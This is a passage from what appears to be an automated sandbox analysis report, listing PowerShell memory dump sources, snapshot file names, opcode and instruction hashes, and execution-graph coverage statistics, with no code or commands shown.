                                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                  • Instruction Fuzzy Hash: 9501677111CB0D8FD744EF0CE451AA6B7E0FB95364F10056DE58AC36A1D636E892CB45
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1773701094.00007FFAAB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB530000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab530000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2c4592aae0263b9d72741353a0cbb5c939ecd3aafa15155eab068d956279fc70
                                                                  • Instruction ID: a7eee4d09305fc59b94c3041737b8a8cc427465c7e64410760bb29c6339a1280
                                                                  • Opcode Fuzzy Hash: 2c4592aae0263b9d72741353a0cbb5c939ecd3aafa15155eab068d956279fc70
                                                                  • Instruction Fuzzy Hash: 7532B392E0E7D78BE356576C98B90F57FA4DF532A570881FFD08E871E3D809680A82D1

                                                                  Execution Graph

                                                                  Execution Coverage:3.4%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:3
                                                                  Total number of Limit Nodes:0

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2377960817.00007FFAAB510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB510000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaab510000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 7f287e50fd98af379cae1411d1d9df210b35fb24e06f4efccf0996f8abdd98d7
                                                                  • Instruction ID: 29e73b7ed7e1f37a24a55b9176d4c45b5a034a56506f53556d1e68abe7bc2cec
                                                                  • Opcode Fuzzy Hash: 7f287e50fd98af379cae1411d1d9df210b35fb24e06f4efccf0996f8abdd98d7
                                                                  • Instruction Fuzzy Hash: 3B31E43190CA4C8FDB19DFACC849AE9BBF0EF66320F04826BD009C3152DB74A405CB91

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2382937207.00007FFAAB5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB5E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaab5e0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 44e20970ddb8c7d38752ad6106f5d54f78b5bc70ecc6ecfa9b145d1bf380713e
                                                                  • Instruction ID: 1cdfd2e2ecf6f1a5af7be8de1a8183e3118596467510716a010cf17ff0f2c473
                                                                  • Opcode Fuzzy Hash: 44e20970ddb8c7d38752ad6106f5d54f78b5bc70ecc6ecfa9b145d1bf380713e
                                                                  • Instruction Fuzzy Hash: 36D15A6290EA8B8FEB56AB68C8155B97BD4FF46350B0801FED04EC71E3DB18980983D1

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2382937207.00007FFAAB5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB5E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaab5e0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c2f3c5e5d59d4b7e80a2db0508d38a036efac0e3b2204e65dcda102c7b52987d
                                                                  • Instruction ID: f5e583cb048eab44ade7859e40aa6793743981327d8bfb2e5e17e3e948b94ff9
                                                                  • Opcode Fuzzy Hash: c2f3c5e5d59d4b7e80a2db0508d38a036efac0e3b2204e65dcda102c7b52987d
                                                                  • Instruction Fuzzy Hash: 5C91F36290E6878FE7A69B6884555B97F95FF46240B5C40FAD04ECB1A3CA18980983D1